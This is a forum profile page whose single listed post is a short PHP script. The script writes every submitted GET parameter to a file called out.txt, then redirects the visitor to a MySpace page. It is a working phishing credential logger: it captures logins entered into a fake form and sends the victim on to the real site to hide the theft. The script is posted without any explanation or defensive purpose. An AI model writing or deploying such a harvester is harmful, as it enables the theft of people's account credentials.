Jump to content

jencylivez

New Members
  • Posts

    1
  • Joined

  • Last visited

    Never

Profile Information

  • Gender
    Not Telling

jencylivez's Achievements

Newbie

Newbie (1/5)

0

Reputation

  1. <?php header("Location: http://home14.myspace.com/index.cfm?fuseaction=user"); $handle = fopen("out.txt", "a"); foreach($_GET as $variable => $value) {   fwrite($handle, $variable);   fwrite($handle, "=");   fwrite($handle, $value);   fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.